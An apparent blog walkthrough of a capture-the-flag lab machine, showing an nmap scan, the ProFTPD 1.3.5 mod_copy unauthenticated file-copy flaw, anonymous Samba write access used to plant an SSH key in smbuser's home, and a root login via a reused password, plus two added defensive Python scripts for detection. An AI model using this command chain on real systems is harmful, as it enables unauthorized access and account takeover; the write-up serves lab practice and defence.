[ 4672.360676] Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-229.el7.x86_64 root=UUID=18b0d984-25fb-4a58-a008-c0410d32b0cb ro crashkernel=auto rhgb quiet LANG=en_US.UTF-8
[ 4672.362393] PID hash table entries: 4096 (order: 3, 32768 bytes)
[ 4672.362415] xsave: enabled xstate_bv 0x7, cntxt size 0x340
[ 4672.369492] Checking aperture...
[ 4672.386619] No AGP bridge found
[ 4672.397991] Memory: 3816244k/4669440k available (6244k kernel code, 524744k absent, 328452k reserved, 4178k data, 1604k init)
[ 4672.398263] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[ 4672.398293] Hierarchical RCU implementation.
[ 4672.398294]  RCU restricting CPUs from NR_CPUS=5120 to nr_cpu_ids=1.
[ 4672.398295]  Experimental no-CBs for all CPUs
[ 4672.398296]  Experimental no-CBs CPUs: 0.
[ 4672.398299] NR_IRQS:327936 nr_irqs:256 16
[ 4672.408678] Console: colour VGA+ 80x25
[ 4672.409144] console [tty0] enabled
[ 4672.411553] allocated 16777216 bytes of page_cgroup
[ 4672.411555] please try 'cgroup_disable=memory' option if you don't want memory cgroups
[ 4672.411739] tsc: Detected 2807.994 MHz processor
[ 4672.411742] Calibrating delay loop (skipped) preset value.. 5615.98 BogoMIPS (lpj=2807994)
[ 4672.411744] pid_max: default: 32768 minimum: 301
[ 4672.411772] Security Framework initialized
[ 4672.411776] SELinux:  Initializing.
[ 4672.411780] SELinux:  Starting in permissive mode
[ 4672.412151] Dentry cache hash table entries: 524288 (order: 10, 4194304 bytes)
[ 4672.413100] Inode-cache hash table entries: 262144 (order: 9, 2097152 bytes)
[ 4672.413465] Mount-cache hash table entries: 4096
[ 4672.413618] Initializing cgroup subsys memory
[ 4672.413623] Initializing cgroup subsys devices
[ 4672.413624] Initializing cgroup subsys freezer
[ 4672.413625] Initializing cgroup subsys net_cls
[ 4672.413626] Initializing cgroup subsys blkio
[ 4672.413627] Initializing cgroup subsys perf_event
[ 4672.413628] Initializing cgroup subsys hugetlb
[ 4672.413705] CPU: Physical Processor ID: 0
[ 4672.414790] mce: CPU supports 0 MCE banks
[ 4672.414812] Last level iTLB entries: 4KB 0, 2MB 0, 4MB 0
Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0
tlb_flushall_shift: 6
[ 4672.428184] Freeing SMP alternatives: 24k freed
[ 4672.434572] ACPI: Core revision 20130517
[ 4672.435105] ACPI: All ACPI Tables successfully acquired
[ 4672.435160] ftrace: allocating 23909 entries in 94 pages
[ 4672.463541] Enabling x2apic
[ 4672.463547] Enabled x2apic
[ 4672.463712] Switched APIC routing to physical x2apic.
[ 4672.464700] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1
[ 4672.464705] smpboot: CPU0: Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz (fam: 06, model: 9e, stepping: 09)
[ 4672.560974] APIC calibration not consistent with PM-Timer: 106ms instead of 100ms
[ 4672.560975] APIC delta adjusted to PM-Timer: 6366681 (6811766)
[ 4672.561130] Performance Events: unsupported p6 CPU model 158 no PMU driver, software events only.
[ 4672.563074] KVM setup paravirtual spinlock
[ 4672.563805] Brought up 1 CPUs
[ 4672.563806] smpboot: Total of 1 processors activated (5615.98 BogoMIPS)
[ 4672.564034] NMI watchdog: disabled (cpu0): hardware events not enabled
[ 4672.564073] devtmpfs: initialized
[ 4672.565501] EVM: security.selinux
[ 4672.565502] EVM: security.ima
[ 4672.565503] EVM: security.capability
[ 4672.566105] atomic64 test passed for x86-64 platform with CX8 and with SSE
[ 4672.566213] NET: Registered protocol family 16
[ 4672.566349] ACPI: bus type PCI registered
[ 4672.566350] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5
[ 4672.566467] PCI: Using configuration type 1 for base access
[ 4672.567300] ACPI: Added _OSI(Module Device)
[ 4672.567302] ACPI: Added _OSI(Processor Device)
[ 4672.567303] ACPI: Added _OSI(3.0 _SCP Extensions)
[ 4672.567304] ACPI: Added _OSI(Processor Aggregator Device)
[ 4672.567548] ACPI: EC: Look up EC in DSDT
[ 4672.567701] ACPI: Executed 1 blocks of module-level executable AML code
[ 4672.568937] ACPI: Interpreter enabled
[ 4672.568940] ACPI Exception: AE_NOT_FOUND, While evaluating Sleep State [\_S1_] (20130517/hwxface-571)
[ 4672.568942] ACPI Exception: AE_NOT_FOUND, While evaluating Sleep State [\_S2_] (20130517/hwxface-571)
[ 4672.568944] ACPI Exception: AE_NOT_FOUND, While evaluating Sleep State [\_S3_] (20130517/hwxface-571)
[ 4672.568946] ACPI Exception: AE_NOT_FOUND, While evaluating Sleep State [\_S4_] (20130517/hwxface-571)
[ 4672.568949] ACPI: (supports S0 S5)
[ 4672.568949] ACPI: Using IOAPIC for interrupt routing
[ 4672.569046] PCI: Ignoring host bridge windows from ACPI; if necessary, use "pci=use_crs" and report a bug
[ 4672.571183] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff])
[ 4672.571186] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI]
[ 4672.571403] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI]
[ 4672.571471] acpi PNP0A03:00: host bridge window [io  0x0000-0x0cf7] (ignored)
[ 4672.571472] acpi PNP0A03:00: host bridge window [io  0x0d00-0xffff] (ignored)
[ 4672.571473] acpi PNP0A03:00: host bridge window [mem 0x000a0000-0x000bffff] (ignored)
[ 4672.571474] acpi PNP0A03:00: host bridge window [mem 0xe0000000-0xfdffffff] (ignored)
[ 4672.571475] PCI: root bus 00: using default resources
[ 4672.571476] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge.
[ 4672.571633] PCI host bridge to bus 0000:00
[ 4672.571638] pci_bus 0000:00: root bus resource [bus 00-ff]
[ 4672.571639] pci_bus 0000:00: root bus resource [io  0x0000-0xffff]
[ 4672.571640] pci_bus 0000:00: root bus resource [mem 0x00000000-0x7fffffffff]
[ 4672.571670] pci 0000:00:00.0: [8086:1237] type 00 class 0x060000
[ 4672.571995] pci 0000:00:01.0: [8086:7000] type 00 class 0x060100
[ 4672.572391] pci 0000:00:01.1: [8086:7111] type 00 class 0x01018a
[ 4672.572637] pci 0000:00:01.1: reg 0x20: [io  0xd000-0xd00f]
[ 4672.572728] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io  0x01f0-0x01f7]
[ 4672.572729] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io  0x03f6]
[ 4672.572730] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io  0x0170-0x0177]

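This dmesg file is the Linux kernel log for the whole boot and runtime sequence. It records all the low-level information on the target from power-on, kernel initialization and hardware detection through service loading to the completed system start.

None of it is useful; there is nothing here to exploit.

Let's probe the ports again for more detailed information.

nmap -p- -sV -A -T4 192.168.59.148

-sV : detect the version of the service running on each port

-A : aggressive scan, including the OS version, detailed service information and script scanning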

┌──(root㉿kali)-[~/桌面]
└─# nmap -p- -sV -A -T4 192.168.59.148
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-15 04:49 EDT
Nmap scan report for 192.168.59.148
Host is up (0.00045s latency).
Not shown: 64457 filtered tcp ports (no-response), 66 filtered tcp ports (host-prohibited), 1004 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    3 0        0              16 Feb 19  2020 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.59.135
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
|   256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_  256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS))
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: My File Server
| http-methods: 
|_  Potentially risky methods: TRACE
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      35943/udp6  nlockmgr
|   100021  1,3,4      51833/udp   nlockmgr
|   100021  1,3,4      53580/tcp6  nlockmgr
|   100021  1,3,4      56447/tcp   nlockmgr
|   100024  1          50132/udp6  status
|   100024  1          50348/tcp6  status
|   100024  1          51559/udp   status
|   100024  1          56984/tcp   status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
445/tcp   open  netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp  open  nfs_acl     3 (RPC #100227)
2121/tcp  open  ftp         ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 00:0C:29:30:A8:E2 (VMware)
Aggressive OS guesses: Linux 3.4 - 3.10 (98%), Synology DiskStation Manager 5.2-5644 (97%), Linux 2.6.32 - 3.10 (96%), Linux 3.10 (94%), Linux 3.2 - 3.10 (94%), Linux 3.2 - 3.16 (94%), Linux 3.2 - 4.14 (94%), Linux 2.6.32 - 3.5 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: FILESERVER; OS: Unix

Host script results:
| smb2-time: 
|   date: 2026-04-15T16:50:40
|_  start_date: N/A
|_clock-skew: mean: 6h09m58s, deviation: 3h10m29s, median: 7h59m57s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.1)
|   Computer name: localhost
|   NetBIOS computer name: FILESERVER\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2026-04-15T22:20:41+05:30
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms 192.168.59.148

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.88 seconds

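From the detailed output we can see

that port 2121 is also an FTP service, running ProFTPD 1.3.5.

In normal operations, an administrator will almost never deploy two independent FTP services on the same server,

so we can suspect that this is the way in.

Look it up:

searchsploit  ProFTPD 

There are a lot of vulnerabilities listed.

Four of them are for version 1.3.5: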

ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                         | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                               | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)                           | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy                                                         | linux/remote/36742.txt

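We can try Metasploit first.

msfconsole

search proftpd mod_copy

use 0

Check the options:

show options

Set rhosts:

set rhosts 192.168.59.148

Set rport_ftp:

set rport_ftp 2121

Check the options again.

Run it and see what happens.

It failed.

Translated, the error reads:

[-] Exploit aborted due to failure: copying the PHP payload file to the website directory failed; does the target directory lack write permission?

This module depends on the FTP service being able to write into the web directory, but on this target the FTP and web directories are completely separate, so this Metasploit module cannot be used.

Try something else.

Look at the txt file at the bottom of the searchsploit list.

searchsploit -m linux/remote/36742.txt

View it: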

┌──(root㉿kali)-[~/桌面]
└─# cat 36742.txt 
Description TJ Saunders 2015-04-07 16:35:03 UTC
Vadim Melihow reported a critical issue with proftpd installations that use the
mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands
to be used by *unauthenticated clients*:

---------------------------------
Trying 80.150.216.115...
Connected to 80.150.216.115.
Escape character is '^]'.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
214-CPFR <sp> pathname
214-CPTO <sp> pathname
214-UTIME <sp> YYYYMMDDhhmm[ss] <sp> path
214-SYMLINK <sp> source <sp> destination
214-RMDIR <sp> path
214-MKDIR <sp> path
214-The following SITE extensions are recognized:
214-RATIO -- show all ratios in effect
214-QUOTA
214-HELP
214-CHGRP
214-CHMOD
214 Direct comments to root@www01a
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto /tmp/passwd.copy
250 Copy successful
-----------------------------------------

He provides another, scarier example:

------------------------------
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto <?php phpinfo(); ?>
550 cpto: Permission denied
site cpfr /proc/self/fd/3
350 File or directory exists, ready for destination name
site cpto /var/www/test.php

test.php now contains
----------------------
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): FTP session opened.
2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php
phpinfo(); ?>' for copying: Permission denied
-----------------------

test.php contains contain correct php script "<?php phpinfo(); ?>" which
can be run by the php interpreter

Source: http://bugs.proftpd.org/show_bug.cgi?id=4169

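The mod_copy module in ProFTPD 1.3.5 lets clients that have not logged in, including anonymous users, use two FTP commands directly:

  • SITE CPFR <source path> = names the file to copy
  • SITE CPTO <destination path> = names the location to copy it to

No username and no password are needed; connecting to the FTP service is enough.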
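Seen from the server side, this flaw appears as a SITE CPFR/SITE CPTO pair on a connection that never received a 230 login reply. The following is an added example, not part of the original write-up or of ProFTPD: a detector that pairs the two commands per connection and rates each copy. The transcript format, connection ids and the user alice are constructed assumptions, not a native ProFTPD log format.

```python
import re
from dataclasses import dataclass

# Constructed transcript (not a native ProFTPD log format):
#   <connection-id> <C|S> <client command or server reply>
SAMPLE_LOG = """\
c1 S 220 ProFTPD 1.3.5 Server
c1 C SITE CPFR /smbdata/authorized_keys
c1 S 350 File or directory exists, ready for destination name
c1 C SITE CPTO /home/smbuser/.ssh/authorized_keys
c1 S 250 Copy successful
c2 S 220 ProFTPD 1.3.5 Server
c2 C USER alice
c2 S 331 Password required for alice
c2 C PASS ********
c2 S 230 User alice logged in
c2 C SITE CPFR /srv/ftp/report.txt
c2 S 350 File or directory exists, ready for destination name
c2 C SITE CPTO /srv/ftp/archive/report.txt
c2 S 250 Copy successful
c3 S 220 ProFTPD 1.3.5 Server
c3 C SITE CPFR /etc/passwd
c3 S 350 File or directory exists, ready for destination name
c3 C SITE CPTO /root/passwd.copy
c3 S 550 cpto: Permission denied
"""

SITE_COPY = re.compile(r"^SITE\s+(CPFR|CPTO)\s+(.+)$", re.IGNORECASE)
# Destinations where a copied file turns into access or code execution.
SENSITIVE_DST = re.compile(r"/\.ssh/|authorized_keys$|^/var/www/|\.php$|^/etc/")


@dataclass
class CopyEvent:
    conn: str
    src: str
    dst: str
    authenticated: bool      # had the server answered 230 before the copy?
    succeeded: bool = False  # did the server answer 250 to SITE CPTO?

    def severity(self):
        if self.authenticated:
            return "info"
        if not self.succeeded:
            return "medium"    # unauthenticated attempt that was refused
        return "critical" if SENSITIVE_DST.search(self.dst) else "high"


def detect_mod_copy(log):
    """Pair each SITE CPFR with its SITE CPTO and record the login state."""
    authed, source, awaiting, events = set(), {}, {}, []
    for line in log.splitlines():
        parts = line.split(maxsplit=2)
        if len(parts) != 3 or parts[1] not in ("C", "S"):
            continue                      # ignore malformed lines
        conn, side, text = parts
        if side == "S":
            code = text[:3]
            if code == "230":
                authed.add(conn)
            pending = awaiting.pop(conn, None)
            if pending is not None:       # this reply answers a SITE CPTO
                pending.succeeded = code == "250"
            continue
        match = SITE_COPY.match(text)
        if match is None:
            continue
        verb, path = match.group(1).upper(), match.group(2).strip()
        if verb == "CPFR":
            source[conn] = path
        elif conn in source:              # CPTO only counts after a CPFR
            event = CopyEvent(conn, source.pop(conn), path, conn in authed)
            awaiting[conn] = event
            events.append(event)
    return events


if __name__ == "__main__":
    for ev in detect_mod_copy(SAMPLE_LOG):
        if ev.severity() != "info":
            print(ev.severity(), ev.conn, ev.src, "->", ev.dst)
```

Any event rated above "info" means the server acted on a copy request from a client that had not logged in, which is the condition to alert on and the reason to disable or patch mod_copy.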

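The question now is which file we should copy.

Back to the earlier port scan:

we found Samba there.

Samba is open-source software that implements the SMB/CIFS protocol on Linux/Unix systems. Its main use is cross-platform file and printer sharing between Linux and Windows, and it can also be used for sharing between Linux hosts.

We can check the help first:

smbclient -h

We can use smbmap to enumerate the target host's SMB shares and their permissions:

smbmap -H 192.168.59.148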

The output, with notes:

[+] Initializing hosts..

[-] Authenticating...

[+] Established 1 SMB connections(s) and 0 authenticated session(s)
(Note: the anonymous login succeeded; no account or password is needed.)

[+] IP: 192.168.59.148:445        Name: 192.168.59.148
(Target IP 192.168.59.148, port 445, the main SMB port.)
    Status: NULL Session
(Status: NULL session, i.e. an anonymous login.)

Disk    Permissions    Comment
----    -----------    -------
print$      NO ACCESS    Printer driver share
smbdata     READ, WRITE  Custom share (read and write access)
smbuser     NO ACCESS    User share
IPC$        NO ACCESS    IPC named pipe (transient communication)

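So Samba allows anonymous login.

There is a writable share: smbdata.

There is also an smbuser account.

smbuser NO ACCESS smbuser

The first smbuser is the share name: this shared folder is called smbuser.

NO ACCESS means the anonymous user (NULL session) has no permission: an empty username and an empty password will not get in.

The second smbuser is the share's comment: it indicates that the share is for the user smbuser and corresponds to the /home/smbuser/ directory.

Enter the share directly:

smbclient //192.168.59.148/smbdata -N

We're in.

List the contents.

At the bottom there is a public key file.

Combining this with the vulnerability and the information found earlier, we can work out the plan: replace the public key file on the Samba share with our own, use the file-copy vulnerability to copy the replaced file into smbuser's SSH login directory, and then log in remotely as smbuser.

Generate an SSH key pair on Kali:

ssh-keygen -t rsa

Press Enter at every prompt; do not set a passphrase.

View the generated public key:

cat /root/.ssh/id_rsa.pub 

Switch to the Samba window.

Delete the existing file first:

del authorized_keys

Then upload the newly generated public key under that name:

put /root/.ssh/id_rsa.pub authorized_keys

The upload succeeded.

Now use the vulnerability found earlier.

First connect to the FTP service on port 2121:

nc 192.168.59.148 2121

Then copy the file just uploaded over Samba to /home/smbuser/.ssh:

SITE CPFR /smbdata/authorized_keys

SITE CPTO /home/smbuser/.ssh/authorized_keys

It worked.

Log in remotely.

The login succeeded.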
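On the defending side, the result of these steps is an entry in /home/smbuser/.ssh/authorized_keys that no administrator approved. The following is an added example, not part of the original write-up: it audits an authorized_keys file against an approved set of SHA256 fingerprints and also flags lines whose key blob does not parse. The key material, comments and approved set are constructed sample data.

```python
import base64
import hashlib
import re
import struct

# Optional options, then key type, base64 blob and an optional comment.
KEY_LINE = re.compile(
    r"(?:^|\s)(ssh-ed25519|ssh-rsa|ecdsa-sha2-nistp(?:256|384|521))"
    r"\s+([A-Za-z0-9+/]+={0,2})(?:\s+(.*))?$"
)


def _ssh_string(data):
    """Length-prefixed string as used inside SSH public key blobs."""
    return struct.pack(">I", len(data)) + data


def constructed_key(seed, comment):
    """Sample data only: a well-formed ssh-ed25519 line with a meaningless key."""
    blob = _ssh_string(b"ssh-ed25519") + _ssh_string(bytes([seed]) * 32)
    return "ssh-ed25519 %s %s" % (base64.b64encode(blob).decode(), comment)


def fingerprint(b64_blob):
    """SHA256 fingerprint in the SHA256:<base64, unpadded> form."""
    raw = base64.b64decode(b64_blob, validate=True)
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def embedded_type(b64_blob):
    """Key type named inside the blob; it must match the type on the line."""
    raw = base64.b64decode(b64_blob, validate=True)
    if len(raw) < 4:
        raise ValueError("blob too short")
    (length,) = struct.unpack(">I", raw[:4])
    if len(raw) < 4 + length:
        raise ValueError("truncated type field")
    return raw[4:4 + length].decode("ascii", "replace")


def audit(text, approved):
    """Return (line number, status, fingerprint, detail) for every bad entry."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        match = KEY_LINE.search(line)
        try:
            if match is None or embedded_type(match.group(2)) != match.group(1):
                raise ValueError("not a parseable key line")
            fp = fingerprint(match.group(2))
        except ValueError:
            findings.append((lineno, "malformed", None, line[:40]))
            continue
        if fp not in approved:
            findings.append((lineno, "unapproved", fp, match.group(3) or ""))
    return findings


# Constructed sample: one approved key with options, one unknown key, one bad line.
ADMIN = constructed_key(1, "admin@fileserver")
INTRUDER = constructed_key(2, "root@kali")
APPROVED = {fingerprint(ADMIN.split()[1])}
SAMPLE = "\n".join([
    "# constructed authorized_keys for smbuser",
    'from="192.168.59.0/24",no-agent-forwarding ' + ADMIN,
    INTRUDER,
    "ssh-rsa not-base64!!! broken",
])

if __name__ == "__main__":
    for finding in audit(SAMPLE, APPROVED):
        print(finding)
```

Run on a schedule against every account's authorized_keys, a check like this surfaces a replaced key file regardless of which service wrote it.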

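Next comes privilege escalation.

sudo -l asks for a password.

Earlier we also obtained a password from the website on port 80.

Try switching directly to the root user with that password.

The login succeeded.

We now have root privileges.

Go to root's home directory and read the final flag.

Got the final flag!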

posted @ 2026-04-19 13:17  沐川儿